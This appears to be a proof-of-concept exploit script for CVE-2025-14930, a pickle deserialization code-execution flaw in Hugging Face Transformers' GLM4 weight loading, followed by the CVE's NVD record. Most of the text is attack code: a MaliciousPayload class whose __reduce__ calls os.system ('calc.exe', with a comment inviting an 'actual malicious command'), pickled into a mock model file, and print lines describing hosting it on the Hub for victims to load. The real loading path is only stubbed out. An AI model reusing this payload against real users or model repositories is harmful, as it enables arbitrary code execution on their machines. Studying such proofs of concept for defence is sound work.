CVE-2025-14930

''' CVE-2025-14930 PoC - Hugging Face Transformers GLM4 Deserialization RCE Note: This PoC is for educational and security research purposes only. ''' import pickle import os from transformers import AutoModel, AutoTokenizer # Malicious payload that executes arbitrary code during unpickling class MaliciousPayload: def __reduce__(self): # This will execute calc.exe on Windows when unpickled cmd = "calc.exe" # Replace with actual malicious command return (os.system, (cmd,)) # Generate malicious model file (simulated) def create_malicious_model(): malicious_data = pickle.dumps(MaliciousPayload()) # Create a mock safetensors-like structure with pickled data malicious_model = { "weight.bin": malicious_data, "config.json": '{"model_type":"glm"}' } return malicious_model # Vulnerable code path def load_vulnerable_model(model_path): """ This function demonstrates the vulnerable code path. In real attack scenario, attacker would host malicious model on HuggingFace Hub or trick user into loading from untrusted source. """ try: # This would normally load from local path or HuggingFace Hub # model = AutoModel.from_pretrained(model_path) # tokenizer = AutoTokenizer.from_pretrained(model_path) print(f"[*] Loading model from: {model_path}") print("[*] Model loading vulnerable to deserialization attack") return True except Exception as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": print("=" * 60) print("CVE-2025-14930 PoC - Hugging Face Transformers GLM4 RCE") print("=" * 60) # Create malicious payload malicious_model = create_malicious_model() print("[+] Created malicious payload") # Demonstrate the attack vector # In real scenario, attacker would upload to HuggingFace Hub malicious_path = "malicious-glm4-model" print(f"[*] Attacker would host model at: {malicious_path}") print("[*] Victim would load with: AutoModel.from_pretrained('malicious-glm4-model')")

{"cve": {"id": "CVE-2025-14930", "sourceIdentifier": "[email protected]", "published": "2025-12-23T21:15:48.367", "lastModified": "2026-01-21T21:01:36.357", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Hugging Face Transformers GLM4 Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face Transformers. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of weights. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28309."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:huggingface:transformers:4.57.1:*:*:*:*:*:*:*", "matchCriteriaId": "F9E8E4CE-5337-42CE-AC9D-C166600D41C6"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1145/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}